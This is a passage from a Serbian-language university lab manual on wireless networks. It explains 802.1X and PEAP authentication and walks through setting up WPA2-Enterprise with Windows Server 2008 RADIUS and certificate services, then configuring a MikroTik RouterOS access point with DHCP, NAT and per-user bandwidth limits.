бежична приступна тачка или комутатор који подржава 802.1x протокол). Сервер за аутентификацију, врши процес аутентификације и ауторизације како би се проверили параметри за приступ супликанта у име аутентификатора. Све три улоге морају учествовати како би се завршила аутентификациона размена. Један систем може имати једну или више улога. Сервер за аутентификацију и аутентификатор могу бити смештени у један систем, што се примењује у мањим мрежним окружењима. У пракси, у већим системима обично се користи посебан сервер за аутентификацију који је независан од система који има улогу аутентификатора. Тако да је погрешна претпоставка да се 802.1X протокол може користити само у великим мрежама где постоје посебни сервери за аутентификацију. Сервер за аутентификацију може бити једноставан процес у бежичној приступној тачки који садржи листу корисничких имена и одговарајућих лозинки. Ово значи да се исти принципи 802.1X протокола могу применити и на SOHO мреже. Ако се сервер за аутентификацију налази у оквиру бежичне приступне тачке онда није потребно присуство RADIUS 37 Extensible Authentication Protocol 38 Network Access Server 128

137 Бежични комуникациони системи сервера, зато што аутентификатор и сервер за аутентификацију немају потребу да комуницирају преко мреже. Супликант и аутентификатор размењују EAP поруке током процеса аутентификације. Ове поруке аутентификатор може прослеђивати серверу за аутентификацију током процеса ауторизације корисника. Ако се сервер за аутентификацију налази на удаљеној локацији, ове поруке се морају слати преко мреже уз помоћ протокола вишег слоја. RADIUS 39 је један од протокола који се користи за пренос ових захтева преко IP мреже. WPA специфицира коришћење RADIUS протокола, наравно и други протоколи се могу користити у ову сврху (нпр. DIAMETER, TACAS+, итд.). Током процеса аутентификације, аутентификатор у мрежу пропушта једино EAP поруке клијента, које се прослеђују одговарајућем RADIUS серверу. Ако се аутентификација успешно заврши кориснику је дозвољен приступ и другим мрежним ресурсима (слика 10.1). Слика 10.1 : 802.1X аутентификација корисника Да би се у току аутентификације корисника преко бежичне мреже заштитили његови параметри за приступ систему, најчешће се користе два типа EAP аутентификације: EAP-PEAP 40 - користи MSCHAPv2 41 као метод аутентификације унутар заштићеног тунела. MSCHAPv2 може једино бити имплементиран ако се лозинке корисника у бази 39 Remote Authentication Dial In User Service 40 Protected EAP 129

138 X Вежба налазе у NT hash или у текстуалном формату. Предност PEAP-а је у томе што је иницијално подржан на Windows оперативним системима без инсталације додатног софтвера. EAP-TTLS 42 - може да користи PAP 43, CHAP 44 или MSCHAPv2 као метод аутентификације унутар заштићеног тунела. Овај протокол подржавају Linux и Apple Mac клијенти, док је на Windows оперативним системе потребно инсталирати додатне апликације. Оба наведена протокола користе PKI 45 како би омогућили клијентима да изврше аутентификацију сервера са којим комуницирају (како би се уверили да је то легитиман сервер) и да уз помоћ сертификата клијенти креирају заштићени тунел кроз који ће послати своје параметре за приступ. Сервер врши аутентификацију клијената употребом корисничког налога и лозинке. На почетку процеса аутентификације кориснички уређај шаље корисничко име у анонимној форми ( anonymous ), што је мера заштите идентитета корисника, јер у том тренутку, пре завршетка успоставе заштићеног канала, идентитет корисника је јавно доступан свакоме ко прислушкује бежични саобраћај. RADIUS сервер као одговор на аутентификациони захтев, шаље клијенту свој дигитални сертификат (за који би било пожељно да је потписан од стране CA 46 ) и који садржи јавни кључ сервера. Клијент може да провери да ли је сервер легитиман на основу примљеног сертификата. Ако је сервер легитиман, клијент користи његов јавни кључ да шифрује своје податке (право корисничко име и лозинку) и у тој форми их прослеђује серверу (слика 10.2). Сервер дешифрује примљену поруку користећи свој приватни кључ и тек тада може видети прави идентитет корисника, што омогућава комплетирање процеса аутентификације. Слика 10.2 : Аутентификација корисника кроз заштићен тунел 41 Microsoft Challenge Handshake Authentication Protocol version 2 42 EAP-Tunneled Transport Layer Security 43 Password authentication protocol 44 Challenge-Handshake Authentication Protocol 45 Public Key Infrastructure 46 Certificate Authority 130

139 Бежични комуникациони системи 10.2 Подешавање WPA/WPA2-Enterprise У овом примеру користиће се Windows Server 2008 на коме ће се инсталирати Активни директоријум, RADIUS сервер и сертификациони сервер. У мањим мрежама, ради уштеде, сва три сервиса могу се налазити на једном серверу. У већим мрежама је пракса да се наведени сервиси налазе на различитим серверима. Подешавање WPA/WPA2-Enterprise окружења извешће се у неколико корака: 1. Инсталација Активног директоријума и креирање корисничких налога. 2. Инсталација сертификационог сервиса и креирање сертификата. 3. Инсталација RADIUS сервера. 4. Подешавање бежичне приступне тачке. 5. Подешавање клијента. Инсталација Активног директоријума и креирање корисничких налога Да бисмо креирали кориснике који ће користити бежичну мрежу поребно је инсталирати Активни директоријум који ће садржати базу корисника. Креирање активног директоријума није тема овог курса тако да ће бити приказани само најосновнији кораци. Ова тема је темељно обрађена на предмету Рачунарске мреже. Први корак је промоција сервера у домен контролер. Потребно је покренути start па након тога унети команду dcpromo. Појавиће се чаробњак који ће нас провести кроз инсталацију Активног директоријума. У наставку чаробњак ће прихватити подразумевана подешавања и изабрати Create new domain in a new forest. Кликнути на Next. 131

140 X Вежба Слика 10.3 : Креирање домена Сада је потребно уписати име домена који желимо да креирамо. Унети bkslab.edu.rs. Кликнути на Next. 132

141 Бежични комуникациони системи Слика 10.4 : Именовање домена До дела за унос лозинке оставити подразумевана подешавања. У делу за унос лозинке унети Password2 и потврдити лозинку. До краја инсталационог чаробњака оставити подразумевана подешавања. На крају, притиснути Finish и рестартовати сервер. Логовати се се са горе постављеном лозинком. Сервер ће вас обавестити да морате да промените лозинку, унесите нову лозинку Password3 и потврдите је. Овим смо завршили инсталацију активног директоријума. Следеће што треба урадити је да се направи организациона јединица (OU - Оrganizаtion unit). Изаберите Start>Administrative Tools>Active Directоry Users and Computers. Отвара се нови прозор. Кликните десним тастером миша на корен стабла имена активног директоријума (bkslab.edu.rs) и изаберите New-Ogranization Unit. Новој организационој јединици дајте име Групе. 133

142 X Вежба Слика 10.5 : Креирање организационе јединице На исти начин направите OU Корисници. Сада би требало да направимо групу Wireless и корисника Марко Ристић. Десни клик на OU Корисници, New-User. Слика 10.6 : Креирање корисника Унесите име и презиме корисника, а за Logon name унесите mristic. Кликните на next и као лозинку унесите и потврдите Password2. Подесите да лозинка никада не истиче. 134

143 Бежични комуникациони системи Још нам преостаје да направимо групу. Десни клик на OU Групе, New-Group. За име групе унесите Wireless. Остала подешавања оставите подразумевана. Учланите корисника у групу. Десни клик на корисника Add to group и унесите име групе Wireless. Слика 10.7 : Учлањивање корисника у групу Инсталација сертификационог сервиса и креирање сертификата Да би користили PEAP протокол потребно је инсталирати сертификациони сервис. Овај сервис ће омогућити креирање сертификационог ауторитета (СА) који ће генерисати и потписивати неопходне серверске сертификате. Клијенти ће уз помоћ ових сертификата вршити валидацију сервера пре него што му пошаљу своје параметре за приступ. На прозору иницијалне конфигурације сервера (Initial Configuration Tasks) одабрати опцију Add roles 47. Селектовати Active Directory Certificate Services и одабрати опцију Next. 47 У случају да прозор иницијалне конфигурације сервера није видљив, покренути Start > Server Manager > Roles 135

144 X Вежба Слика 10.8 : Инсталација сертификационог сервиса На следећем екрану је потребно одабрати Enterprise тип сертификационог ауторитета и затим одабрати опцију Next. Слика 10.9 : Одабир типа сертификационог ауторитета 136

145 Бежични комуникациони системи У следећа три прозора поребно је: одабрати Root CA тип сервера, одабрати опцију која ће генерисати нови приватни кључ (Create a new private key), прихватити предефинисана криптографска подешавања за СА. Потребно је именовати СА сервер, могу се оставити предефинисана подешавања (слика 10.10). Слика : Додељивање имена СА серверу У наредном прозору конфигурисати период важења сертификата на пет година, затим у наредном прозору прихватити предефинисана подешавања за инсталацију базе података сертификационог сервиса. У последњем прозору инсталационог чаробњака одабрати опцију Install. Након инсталације сертификационог сервиса могуће је креирати сертификате неопходне за PEAP аутентификацију. Најпре је потребно креирати Microsoft управљачку конзолу (ММС): Start > MMС > Enter. У MMC прозору одабрати следеће опције: File > Add/Remove Snap-in. Селектовати опцију Certificates (слика 10.11), а затим опцију Add. 137

146 X Вежба Слика : Подешавање MMC конзоле У прозору који се појави селектовати Computer account, и одабрати опцију Next (слика 10.12). Затим селектовати Local computer, одабрати опцију Finish, и на крају опцију OK. Слика : Наставак подешавања MMC конзоле Да би генерисали сертификат отворити чвор Certificates (Local Computer Account)>Personal, затим десни клик на Certificates >All tasks>request new certificates (слика 10.13). На следећем прозору одабрати опцију Domain Controller, и опцију Enroll. Након успешног генерисања сертификата одабрати опцију Finish. 138

147 Бежични комуникациони системи Инсталација RADIUS сервера Слика : Генерисање новог сертификата У претходним верзијама Windows Server оперативног система RADIUS сервис је био интегрисан у IAS 48 модулу. Од верзије Windows Server 2008 оперативног система RADIUS сервис је део Network Policy and Access Services модула. На прозору иницијалне конфигурације сервера (Initial Configuration Tasks) одабрати опцију Add roles. Селектовати Network Policy and Access Services и одабрати опцију Next (слика 10.14). 48 Internet Authenticate Service 139

148 X Вежба Слика : Инсталација Network Policy and Access Services модула Након уводног прозора селектовати следеће опције (слика 10.15): Network Policy Server, Routing and Remote Access Servers, Remote Access Services, Routing. 140

149 Бежични комуникациони системи Слика : Инсталација додатних модула Након инсталације модул је потребно конфигурисати како би имао функционалности RADIUS сервера. Одабрати опцијe Start > nps.ms > Enter. Да бисмо подесили сервер потребно је из падајуће листе одабрати опцију RADIUS server for 802.1X Wireless or Wired Connections (слика 10.16). 141

150 X Вежба Слика : Конфигурација RADIUS сервера Одабрати опцију за конфигурацију 802.1X стандарда (Configure 802.1x). Као тип 802.1Х конекције одабрати Secure Wireless Connection и одаберите Next. Неопходно је додати RADIUS клијента (у овом случају то је бежична приступна тачка) одабиром опције Add и унесите следећа подешавања (слика 10.17): Friendly name: AP IP Address: (адреса локалног мрежног адаптера на бежичној приступној тачки) Shared Secret: Password12345 Ова дељена тајна користиће се за шифровање података између RADIUS сервера и RADIUS клијента. 142

151 Бежични комуникациони системи Слика : Додавање RADIUS клијента У наредним корацима потребно је подесити метод аутентификације да буде Microsoft: Protected EAP (PEAP), а у прозору за додавање корисничких група које могу да приступе бежичној мрежи одабрати претходно креирану групу Wireless. На крају ових подешавања потребно је ресетовати NPS модул. Подешавање бежичне приступне тачке У наставку вежбе конфигурисаћемо бежичну приступну тачку тако да врши аутентификацију клијената помоћу RSDIUS сервера. На страници Wireless Security изаберите опције (слика 10.18): WPA/WPA2, o Version: WPA2, o Encryption: AES, o унесити IP RADIUS сервера, као и RADIUS шифру коју смо претходно подесили на серверу (Password12345). Подразумева се да су остали параметри бежичне мреже тачно подешени (SSID, фреквенција, адресе, итд...). 143

152 X Вежба Подешавање клијента Слика : Подешавање бежичне приступне тачке Да би клијент могао да изврши валидацију сервера неопходно је на клијенту инсталирати CA сертификат. Како би на клијенту инсталирали овај сертификат морамо прво да га извеземо са сервера. Отворити претходно креирану MMC конзолу, отворити чвор Certificates (Local Computer Account) > Personal, и одабрати опцију Certificates. Одабрати СА сертификат десним кликом миша, All Tasks > Export (слика 10.19). 144

153 Бежични комуникациони системи Слика : Извоз СА сертификата Код извоза сертификатa не треба извозити приватни кључ сервера, а формат сертификата треба да буде DER. Овако извезен сертификат може се копирати на жељене клијенте и затим инсталирати. Дуплим кликом миша на сертификат добијамо прозор у коме постоји опција за инсталацију сертификата (слика 10.20), одабиром ове опције покреће се инсталациони чаробњак који треба искористити да се сертификат увезе као валидан СА сертификат (Trusted Root Certificate Authorities). Овим смо инсталирали сертификат. Остаје нам само да подесимо супликант да користи наш сертификат као и WPA2-Enterprise метод заштите. 145

154 X Вежба Слика : Инсталација сертификата на клијенту Потребно је направити сигурносни профил за жељену бежичну мрежу. На Windows 7 оперативном систему изаберите у доњем десном углу бежичну конекцију и кликните десним тастером миша на SSID мреже којој желите да приступите. Затим изаберите Properties. У одељку везаном за сигурност (Security у Windows Vista и Windows 7, Advanced одељак у Windows XP) подесити WPA2-Enterprise као сигурносни механизам који ће се користити, док ће се за шифровање користити AES алгоритам (слика 10.21). Код Windows XP оперативног система потребно је одабрати опцију Enable IEEE 802.1x authentication for this network. 146

155 Бежични комуникациони системи Слика : Подешавање сигурносног профила бежичне мреже У Windows 7 оперативном систему у напредним подешавањима (Advanced Settings) потребно је одабрати аутентификацију корисника (User Authentication) као начин аутентификације (Specify authentication mode). Сада треба подесити сертификате који ће се користити, одабиром опције Settings код PEAP методе за аутентификацију. Отвара се прозор за подешавање PEAP опција у којем треба подесити следеће опције (слика 10.22): потребно је одабрати опцију за проверу исправности серверског сертификата (Validate server certificate), потребно је навести име сервера (Connect to these servers), потребно је селектовати СА сертификат који смо увезли и инсталирали, за метод аутентификације корисника одабрати Secured password (EAP-MSCHAP v2). 147

156 X Вежба Слика : Подешавање PEAP аутентификације Када је све исконфигурисано може се тестирати приступ бежичној мрежи. Систем ће тражити да се унесу параметри за приступ корисника, у вежби ће се користити налог корисника који је креиран у првом кораку, односно: Username: mristic Password: Password2 Активност 1: Конфигурација WPA2-Enterprise механизма заштите На основу упутства конфигурисати WPA2-Enterprise механизам заштите. Вежба се изводи у паровима, где ће један од учесника имати улогу бежичног клијента док ће други имати улогу RADIUS сервера. RADIUS сервер ће бити покренут на виртуелној машини. 148

157 XI ВЕЖБА УПОТРЕБА MikroTik RouterOS У БЕЖИЧНИМ МРЕЖАМА Студенти ће у овој вежби имати прилику да се упознају са MikroTik мрежним уређајима. Ови уређаји веома су популарни и користе се у великом броју различитих типова бежичних мрежа широм света. Студенти ће се кроз практичан пример упознати са крактеристикама и могућностима ових уређаја. 149

158 XI Вежба 11. Употреба MikroTik RouterOS у бежичним мрежама 11.1 MikroTik RouterOS RouterOS представља оперативни систем који је искључиво намењен за рад са мрежним сервисима. MikroTik је рутерски оперативни систем који је заснован на Linux-у. Иако је заснован на Linux-у, MikroTik није пројекат са јавно доступним изворним кодом. Превасходно је направљен као оперативни систем за бежичне рутере али се временом позиционирао на тржишту као одлично решење и за SOHO кориснике. Тренутно је врло популаран и коришћен у великом броју различитих типова бежичних мрежа широм света. Популарност је стекао због одличног односа цене и квалитета. Иницијално, MikroTik је замишљен да се извршава на x86 архитектури процесора тј. на обичним рачунарима који су припремљени тако да задовоље захтеве одређеног мрежног окружења (додавано је више мрежних адаптера различитих типова). Временом је пројекат еволуирао, па је поред x86 верзије започета израда и малих система за рутирање (малих димензија, мале потрошње енергије, мале цене, итд ). Ови системи су добили назив RouterBoard (слика 11.1) и израђују се са процесорима различитих перформанси. RouterBoard уређаји најчешће су засновани на процесорима из MIPS фамилије (RISC) којима се постижу одличне карактеристике по врло приступачним ценама израде. С обзиром на велику снагу данашњих x86 процесора ови уређаји могу да подрже и мрежне протоколе који захтевају уређаје озбиљнијих перформанси (L2PT VPN, IPSec VPN, мрежни адаптери од 1Gbps..). Због оваквих карактеристика ови релативно јефтини уређаји могу успешно да парирају уређајима који су доста скупљи. Слика 11.1 : MikroTik RouterBoard модели У случају да се MikroTik RouterOS инсталира на x86 систем потребно је проверити да ли је хардвер компатибилан са драјверима у MikroTik систему. Листа са подржаним хардвером може се наћи на официјалном сајту произвођача Повезивање на MikroTik систем MikroTik уређају може се приступити на неколико начина: 150

159 Бежични комуникациони системи путем конзолног приступа (SSH/Telnet), Winbox програмом (графичко окружење, које се препоручује за почетнике), путем Web stranice (на којој је доступан само делимичан број команди). Конзолни приступ кроз CLI 49 oкружење препоручује се искуснијим корисницима, али је понекад неопходан пре коришћења Winbox програма (нпр. у ситуацијама када има проблема са учитавањем DLL модула за Winbox програм). Препоручује се коришћење Winbox програма, малог услужног програма који служи за подешавање рутера кроз графичко корисничко окружење. Овај програм може се преузети са самог рутера или са официјалног сајта произвођача. Winbox програм може да комуницира са уређајем преко протокола другог слоја OSI референтног модела. То практично значи да на уређају није потребно подесити IP адресу и остале мрежне параметре да би се извршила иницијална конфигурација. Када се покрене Winbox програм потребно је успоставити везу са жељеним уређајем. Доступни уређаји ће се појавити у падајућој листи која се активира одабиром дугмета које је означено бројем 1 на слици На слици се може видети да је предефинисана мрежна адреса Слика 11.2 : Успостава везе са уређајем Ако желимо да приступамо уређају преко протокола другог слоја OSI референтног модела потребно је одабрати MAC адресу уређаја. Предефинисано корисничко име је admin, док лозинка не постоји. Одабиром опције Connect (број 2 на слици 11.2) повезујемо се на уређај. 49 Command line interface 151

160 XI Вежба 11.3 Подешавање бежичне приступне тачке на MikroTik уређају Овај пример приказује један практичан сценарио у коме је потребно подесити уређај да има улогу бежичне приступне тачке. На слици 11.3 дат је шематски приказ топологије. Слика 11.3 : Шематски приказ топологије Пројектни захеви у овом сценарију су следећи: LAN мрежни адаптер има јавну статичку адресу /20, идентификатор скупа сервиса бежичне мреже има ознаку BksMT, у бежичној мрежи је обавезна употреба сигурносног механизма - WPA2, клијенти у бежичној мрежи треба аутоматски да добијају IP адресе из приватног опсега адреса /24, бежичним клијентима обезбедити приступ Интернету, потребно је сваком бежичном клијенту ограничити проток података на 1Mbs. Подешавање IP адресе на мрежним адаптерима врши се у прозору IP>Addresses. Дуплим кликом миша на жељени мрежни адаптер, који се налази у прозору Address List, отвара се нови прозор Address у коме вршимо унос жељене адресе (слика 11.4). У овом прозору уносимо адресу за етернет мрежни адаптер. 152

161 Бежичнии комуникациони системи Слика 11.4 : Подешавање IP адресе на етернет адаптеру у Бежични мрежни адаптер мора се додати у прозору Address List (на црвени знак плус у левом горњем углуу прозора) да бисмо били у могућности да му м доделимоо адресу. Бежичном мрежномм адаптеру доделићемо прву адресу из захтеваног мрежног опсега /24 (слика 11.5). 153

162 XI Вежба Слика 11.5 : Подешавање IP адресее на бежичном адаптеру Подешавања бежичне мреже може се започети креирањем сигурносног с профила у коме се врши одабир механизама за заштиту (Wireless>Security Profiles>Add - црвени знакк плус ). Креирати профил са опцијама приказаним на слици

163 Бежичнии комуникациони системи Слика 11.6 : Подешавање сигурносних профила заа бежичну мрежу Као што се видии на слици профил смоо назвали WPA2-profil и унета је жељена лозинка за приступ мрежи од минимум осам карактера. Овај профил искористиће се у следећем кораку када се буду подешавали параметри бежичне мреже. Подешавање параметара бежичне мреже врши се у Wireless>Interfacess прозору, одабиром жељеног мрежног адаптера ( у овом примеру то је мрежни адаптер а wlan1). На слици 11.7 приказани су параметри које је потребно подесити. Треба приметити да је уређај постављен да ради у ap-bridge режиму рада,, и да је одабран претходно креиран сигурноснии профил. 155

164 XI Вежба Слика : Подешавање параметара бежичне мреже Од овог тренутка активна је бежична мрежа и сада је потребноо подесити DHCP сервис који ће додељивати адресее бежичним клијентима. DHCP сервис је најлакше подесити помоћу опције IP>DHCPP Server>DHCP Setup.. У овом примеру подешено је да преко wlan1 мрежног адаптера DHCP сервер додељује адресее клијентима. Подешена је мрежа / /24 за коју ће сервер да издаје адресе, и подешен је подразумевани мрежни пролаз (адреса wlan1 мрежног адаптера ) преко кога ће клијенти приступати осталим мрежама. Опсегг адреса који ће се додељивати клијентима је Потребно је подесити и адресу DNS сервера и период издавања адреса. На слици 11.8 приказана је конфигурацијаа DHCP сервера. 156

165 Бежични комуникациони системи Слика 11.8 : Подешавања DHCP сервера Да би бежичним клијентима омогућили излазак на Интернет потребно је извршити превођење приватних адреса у јавну адресу (NAT). У овом примеру ће се адресе из опсега /24 превести у адресу која је подешена на ether1 мрежном адаптеру. Подшеавање NAT сервиса врши се у прозору IP>Firewall>NAT. У картици General подестити (слика 11.9): опцију chain: SRCNAT, опсег изворишних адреса: /24 опсег одредишних адреса: /0 (што представља све адресе), излазни мрежни адаптер: ether1. У картици Action потребно је подасити да тип NAT-a буде MASQUERADE. Након ових подешавања бежични клијенти требало би да имају приступ Интернету. 157

166 XI Вежба Слика 11.9 : Подешавање превођења мрежних адреса MikroTik пружа велики број могућности контроле протока мрежног саобраћаја. У овом примеру биће приказан један од начина ограничавања протока интернет конекције на 1Mbs сваком кориснику понаособ. MikroTik контролу протока остварује креирањем редова чекања за пакете, и на тај начин на основу задатих правила регулише колико времена сваки пакет треба да чека и када му време чекања истекне да буде пропуштен на одредиште. Подешавање контроле протока мрежног саобраћаја биће одрађено из командне линије. Приказана команда представља правило које ће ограничити свим корисницима проток интернет конекције на 1Mbs: /queue simple add name="1m-korisnici" dstaddress= /24 interface=ether1 direction=both priority=8 queue=default/default limit-at= / maxlimit= / disabled=no Где је: name - именовање правила, dst-address - адреса рачунара на који се односи правило (у овом примеру правило се односи на цео опсег адреса); interface - правило се односи само на конекције на наведеном мрежном адаптеру. Ether1 је мрежни адаптер преко кога се приступа Интернету. Ако ниједан адаптер није наведен, онда то значи да се правило примењује на све мрежне адаптере заједно; direction - правила ограничења брзине односе се на само један смер података (одлазни или долазни). MikroTik омогућава да се оба смера података истовремено ограничавају; 158

налазе се у диелектрику, релативне диелектричне константе ε r = 2, на међусобном растојању 2 a ( a =1cm

налазе се у диелектрику, релативне диелектричне константе ε r = 2, на међусобном растојању 2 a ( a =1cm 1 Два тачкаста наелектрисања 1 400 p и 100p налазе се у диелектрику релативне диелектричне константе ε на међусобном растојању ( 1cm ) као на слици 1 Одредити силу на наелектрисање 3 100p када се оно нађе:

Διαβάστε περισσότερα

предмет МЕХАНИКА 1 Студијски програми ИНДУСТРИЈСКО ИНЖЕЊЕРСТВО ДРУМСКИ САОБРАЋАЈ II ПРЕДАВАЊЕ УСЛОВИ РАВНОТЕЖЕ СИСТЕМА СУЧЕЉНИХ СИЛА

предмет МЕХАНИКА 1 Студијски програми ИНДУСТРИЈСКО ИНЖЕЊЕРСТВО ДРУМСКИ САОБРАЋАЈ II ПРЕДАВАЊЕ УСЛОВИ РАВНОТЕЖЕ СИСТЕМА СУЧЕЉНИХ СИЛА Висока техничка школа струковних студија у Нишу предмет МЕХАНИКА 1 Студијски програми ИНДУСТРИЈСКО ИНЖЕЊЕРСТВО ДРУМСКИ САОБРАЋАЈ II ПРЕДАВАЊЕ УСЛОВИ РАВНОТЕЖЕ СИСТЕМА СУЧЕЉНИХ СИЛА Садржај предавања: Систем

Διαβάστε περισσότερα

1.2. Сличност троуглова

1.2. Сличност троуглова математик за VIII разред основне школе.2. Сличност троуглова Учили смо и дефиницију подударности два троугла, као и четири правила (теореме) о подударности троуглова. На сличан начин наводимо (без доказа)

Διαβάστε περισσότερα

Теорија електричних кола

Теорија електричних кола др Милка Потребић, ванредни професор, Теорија електричних кола, вежбе, Универзитет у Београду Електротехнички факултет, 7. Теорија електричних кола i i i Милка Потребић др Милка Потребић, ванредни професор,

Διαβάστε περισσότερα

10.3. Запремина праве купе

10.3. Запремина праве купе 0. Развијени омотач купе је исечак чији је централни угао 60, а тетива која одговара том углу је t. Изрази површину омотача те купе у функцији од t. 0.. Запремина праве купе. Израчунај запремину ваљка

Διαβάστε περισσότερα

ВИСОКА ТЕХНИЧКА ШКОЛА СТРУКОВНИХ СТУДИЈА У НИШУ

ВИСОКА ТЕХНИЧКА ШКОЛА СТРУКОВНИХ СТУДИЈА У НИШУ ВИСОКА ТЕХНИЧКА ШКОЛА СТРУКОВНИХ СТУДИЈА У НИШУ предмет: ОСНОВИ МЕХАНИКЕ студијски програм: ЗАШТИТА ЖИВОТНЕ СРЕДИНЕ И ПРОСТОРНО ПЛАНИРАЊЕ ПРЕДАВАЊЕ БРОЈ 2. Садржај предавања: Систем сучељних сила у равни

Διαβάστε περισσότερα

г) страница aa и пречник 2RR описаног круга правилног шестоугла јесте рац. бр. јесу самерљиве

г) страница aa и пречник 2RR описаног круга правилног шестоугла јесте рац. бр. јесу самерљиве в) дијагонала dd и страница aa квадрата dd = aa aa dd = aa aa = није рац. бр. нису самерљиве г) страница aa и пречник RR описаног круга правилног шестоугла RR = aa aa RR = aa aa = 1 јесте рац. бр. јесу

Διαβάστε περισσότερα

КРУГ. У свом делу Мерење круга, Архимед је први у историји математике одрeдио приближну вред ност броја π а тиме и дужину кружнице.

КРУГ. У свом делу Мерење круга, Архимед је први у историји математике одрeдио приближну вред ност броја π а тиме и дужину кружнице. КРУГ У свом делу Мерење круга, Архимед је први у историји математике одрeдио приближну вред ност броја π а тиме и дужину кружнице. Архимед (287-212 г.п.н.е.) 6.1. Централни и периферијски угао круга Круг

Διαβάστε περισσότερα

2. Наставни колоквијум Задаци за вежбање ОЈЛЕРОВА МЕТОДА

2. Наставни колоквијум Задаци за вежбање ОЈЛЕРОВА МЕТОДА . колоквијум. Наставни колоквијум Задаци за вежбање У свим задацима се приликом рачунања добија само по једна вредност. Одступање појединачне вредности од тачне вредности је апсолутна грешка. Вредност

Διαβάστε περισσότερα

TAЧКАСТА НАЕЛЕКТРИСАЊА

TAЧКАСТА НАЕЛЕКТРИСАЊА TЧКАСТА НАЕЛЕКТРИСАЊА Два тачкаста наелектрисања оптерећена количинама електрицитета и налазе се у вакууму као што је приказано на слици Одредити: а) Вектор јачине електростатичког поља у тачки А; б) Електрични

Διαβάστε περισσότερα

Положај сваке тачке кружне плоче је одређен са поларним координатама r и ϕ.

Положај сваке тачке кружне плоче је одређен са поларним координатама r и ϕ. VI Савијање кружних плоча Положај сваке тачке кружне плоче је одређен са поларним координатама и ϕ слика 61 Диференцијална једначина савијања кружне плоче је: ( ϕ) 1 1 w 1 w 1 w Z, + + + + ϕ ϕ K Пресечне

Διαβάστε περισσότερα

6.2. Симетрала дужи. Примена

6.2. Симетрала дужи. Примена 6.2. Симетрала дужи. Примена Дата је дуж АВ (слика 22). Тачка О је средиште дужи АВ, а права је нормална на праву АВ(p) и садржи тачку О. p Слика 22. Права назива се симетрала дужи. Симетрала дужи је права

Διαβάστε περισσότερα

Вектори vs. скалари. Векторске величине се описују интензитетом и правцем. Примери: Померај, брзина, убрзање, сила.

Вектори vs. скалари. Векторске величине се описују интензитетом и правцем. Примери: Померај, брзина, убрзање, сила. Вектори 1 Вектори vs. скалари Векторске величине се описују интензитетом и правцем Примери: Померај, брзина, убрзање, сила. Скаларне величине су комплетно описане само интензитетом Примери: Температура,

Διαβάστε περισσότερα

Слика 1. Слика 1.2 Слика 1.1

Слика 1. Слика 1.2 Слика 1.1 За случај трожичног вода приказаног на слици одредити: а Вектор магнетне индукције у тачкама А ( и ( б Вектор подужне силе на проводник са струјом Систем се налази у вакууму Познато је: Слика Слика Слика

Διαβάστε περισσότερα

7.3. Површина правилне пирамиде. Површина правилне четворостране пирамиде

7.3. Површина правилне пирамиде. Површина правилне четворостране пирамиде математик за VIII разред основне школе 4. Прво наћи дужину апотеме. Како је = 17 cm то је тражена површина P = 18+ 4^cm = ^4+ cm. 14. Основа четворостране пирамиде је ромб чије су дијагонале d 1 = 16 cm,

Διαβάστε περισσότερα

7. ЈЕДНОСТАВНИЈЕ КВАДРАТНЕ ДИОФАНТОВE ЈЕДНАЧИНЕ

7. ЈЕДНОСТАВНИЈЕ КВАДРАТНЕ ДИОФАНТОВE ЈЕДНАЧИНЕ 7. ЈЕДНОСТАВНИЈЕ КВАДРАТНЕ ДИОФАНТОВE ЈЕДНАЧИНЕ 7.1. ДИОФАНТОВА ЈЕДНАЧИНА ху = n (n N) Диофантова једначина ху = n (n N) има увек решења у скупу природних (а и целих) бројева и њено решавање није проблем,

Διαβάστε περισσότερα

Анализа Петријевих мрежа

Анализа Петријевих мрежа Анализа Петријевих мрежа Анализа Петријевих мрежа Мере се: Својства Петријевих мрежа: Досежљивост (Reachability) Проблем досежљивости се састоји у испитивању да ли се може достићи неко, жељено или нежељено,

Διαβάστε περισσότερα

6.5 Површина круга и његових делова

6.5 Површина круга и његових делова 7. Тетива је једнака полупречнику круга. Израчунај дужину мањег одговарајућег лука ако је полупречник 2,5 сm. 8. Географска ширина Београда је α = 44 47'57", а полупречник Земље 6 370 km. Израчунај удаљеност

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА МАТЕМАТИКА ТЕСТ

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА МАТЕМАТИКА ТЕСТ Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА МАТЕМАТИКА ТЕСТ УПУТСТВО ЗА ОЦЕЊИВАЊЕ ОБАВЕЗНО ПРОЧИТАТИ ОПШТА УПУТСТВА 1. Сваки

Διαβάστε περισσότερα

АНАЛОГНА ЕЛЕКТРОНИКА ЛАБОРАТОРИЈСКЕ ВЕЖБЕ

АНАЛОГНА ЕЛЕКТРОНИКА ЛАБОРАТОРИЈСКЕ ВЕЖБЕ ЕЛЕКТРОТЕХНИЧКИ ФАКУЛТЕТ У БЕОГРАДУ КАТЕДРА ЗА ЕЛЕКТРОНИКУ АНАЛОГНА ЕЛЕКТРОНИКА ЛАБОРАТОРИЈСКЕ ВЕЖБЕ ВЕЖБА БРОЈ 2 ПОЈАЧАВАЧ СНАГЕ У КЛАСИ Б 1. 2. ИМЕ И ПРЕЗИМЕ БР. ИНДЕКСА ГРУПА ОЦЕНА ДАТУМ ВРЕМЕ ДЕЖУРНИ

Διαβάστε περισσότερα

ОБЛАСТИ: 1) Тачка 2) Права 3) Криве другог реда

ОБЛАСТИ: 1) Тачка 2) Права 3) Криве другог реда ОБЛАСТИ: ) Тачка ) Права Jov@soft - Март 0. ) Тачка Тачка је дефинисана (одређена) у Декартовом координатном систему са своје две коодринате. Примери: М(5, ) или М(-, 7) или М(,; -5) Jov@soft - Март 0.

Διαβάστε περισσότερα

Предмет: Задатак 4: Слика 1.0

Предмет: Задатак 4: Слика 1.0 Лист/листова: 1/1 Задатак 4: Задатак 4.1.1. Слика 1.0 x 1 = x 0 + x x = v x t v x = v cos θ y 1 = y 0 + y y = v y t v y = v sin θ θ 1 = θ 0 + θ θ = ω t θ 1 = θ 0 + ω t x 1 = x 0 + v cos θ t y 1 = y 0 +

